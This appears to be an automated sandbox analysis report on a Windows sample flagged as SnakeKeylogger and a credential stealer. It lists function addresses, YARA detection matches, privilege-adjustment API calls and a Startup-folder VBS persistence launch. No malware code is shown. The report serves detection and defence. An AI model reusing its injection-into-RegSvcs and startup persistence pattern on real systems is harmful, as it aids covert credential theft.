                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585BC673_2_0585BC67
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058534603_2_05853460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585DC683_2_0585DC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585BC783_2_0585BC78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058557803_2_05855780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585F7B93_2_0585F7B9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585D7C93_2_0585D7C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585F7C83_2_0585F7C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585B7D93_2_0585B7D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585D7D83_2_0585D7D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585B7E83_2_0585B7E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05852FF83_2_05852FF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058577113_2_05857711
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058527483_2_05852748
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058527583_2_05852758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585EE973_2_0585EE97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05851E983_2_05851E98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585CEA73_2_0585CEA7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05851EA83_2_05851EA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585EEA83_2_0585EEA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585AEB73_2_0585AEB7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585CEB83_2_0585CEB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05854EC23_2_05854EC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585AEC83_2_0585AEC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05854ED03_2_05854ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058546103_2_05854610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058546203_2_05854620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05856E603_2_05856E60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05856E703_2_05856E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058511903_2_05851190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058511A03_2_058511A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058541B83_2_058541B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058541C83_2_058541C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585C1083_2_0585C108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585A0D03_2_0585A0D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058508E13_2_058508E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585A0E03_2_0585A0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585E0E83_2_0585E0E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058508F03_2_058508F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585E0F83_2_0585E0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585C0F83_2_0585C0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058500073_2_05850007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058530083_2_05853008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058560203_2_05856020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058560303_2_05856030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058500403_2_05850040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05852BAF3_2_05852BAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05852BB03_2_05852BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05855BCA3_2_05855BCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05855BD83_2_05855BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058523003_2_05852300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058553183_2_05855318
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058553283_2_05855328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585F3283_2_0585F328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585D3373_2_0585D337
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585F3383_2_0585F338
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585D3483_2_0585D348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05858B483_2_05858B48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585B3483_2_0585B348
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585B3583_2_0585B358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058572B83_2_058572B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058572C83_2_058572C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_058522F13_2_058522F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585EA073_2_0585EA07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585CA173_2_0585CA17
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05856A183_2_05856A18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585EA183_2_0585EA18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05856A1A3_2_05856A1A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0585CA283_2_0585CA28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05851A403_2_05851A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05851A503_2_05851A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05854A683_2_05854A68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05854A783_2_05854A78
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 7_2_00C40BA07_2_00C40BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089A0888_2_0089A088
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089C1478_2_0089C147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089D2788_2_0089D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008953628_2_00895362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089C4688_2_0089C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089C7388_2_0089C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089E9888_2_0089E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008969A08_2_008969A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008939F08_2_008939F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089CA088_2_0089CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089CCD88_2_0089CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089CFAA8_2_0089CFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00896FC88_2_00896FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089F6308_2_0089F630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008929EC8_2_008929EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089E97A8_2_0089E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0089FA888_2_0089FA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00893E098_2_00893E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD29688_2_05FD2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD95488_2_05FD9548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD50288_2_05FD5028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD9C188_2_05FD9C18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD17A08_2_05FD17A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD0B308_2_05FD0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD1E808_2_05FD1E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDE2588_2_05FDE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDDDFF8_2_05FDDDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD9A88_2_05FDD9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD9998_2_05FDD999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD295A8_2_05FD295A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD5508_2_05FDD550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD5408_2_05FDD540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDD0F88_2_05FDD0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDCCA08_2_05FDCCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDCC8F8_2_05FDCC8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDFC688_2_05FDFC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDFC588_2_05FDFC58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD00408_2_05FD0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD50188_2_05FD5018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDF8108_2_05FDF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD00068_2_05FD0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDF8018_2_05FDF801
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDF3B88_2_05FDF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDF3A88_2_05FDF3A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD8BA08_2_05FD8BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD178F8_2_05FD178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDEF608_2_05FDEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDEF518_2_05FDEF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD0B208_2_05FD0B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDEB088_2_05FDEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDEAF88_2_05FDEAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDE6B08_2_05FDE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDE6AF8_2_05FDE6AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FD1E708_2_05FD1E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDE2498_2_05FDE249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05FDDE008_2_05FDDE00
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: String function: 008E7DE1 appears 35 times
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: String function: 00908900 appears 42 times
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: String function: 00900AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: String function: 00B08900 appears 42 times
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: String function: 00B00AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: String function: 00AE7DE1 appears 36 times
                Source: 6cicUo3f8g.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@5/3
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094A06A GetLastError,FormatMessageW,0_2_0094A06A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009381CB AdjustTokenPrivileges,CloseHandle,0_2_009381CB
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_009387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009387E1
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B381CB AdjustTokenPrivileges,CloseHandle,2_2_00B381CB
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00B387E1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0094B3FB
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0095EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0095EE0D
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_0094C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0094C397
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008E4E89
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeFile created: C:\Users\user\AppData\Local\ThebesianJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeFile created: C:\Users\user\AppData\Local\Temp\aut6785.tmpJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs"
